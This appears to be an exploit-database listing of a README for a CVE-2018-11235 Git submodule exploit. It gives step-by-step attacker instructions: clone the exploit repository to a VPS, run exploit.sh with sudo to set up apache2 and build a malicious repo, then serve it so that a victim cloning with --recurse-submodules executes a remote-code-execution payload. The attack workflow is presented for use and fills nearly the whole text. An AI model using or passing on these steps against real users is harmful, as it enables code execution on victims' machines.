Share
## https://sploitus.com/exploit?id=BA19BC3C-61E9-5161-9173-C0FADF19D739
# CVE-2018-11235
1. `ssh` to your vps.
2. Clone this repo:
```bash
git clone https://github.com/Rezy-Dev/CVE-2018-11235
cd CVE-2018-11235
```
3. Give `exploit.sh` execute (`x`) permission then execute it: 
```bash
sudo chmod +x exploit.sh
sudo ./exploit.sh
```

> It downloads apache2 and builds malicious repo for us.

4. Once done we can use the link `http://vps-ip/malicious.git` as a git repo.
5. When victim clones it like:
```
git clone --recurse-submodules http://vps-ip/malicious.git
```
The payload rce command should execute.

Thank you!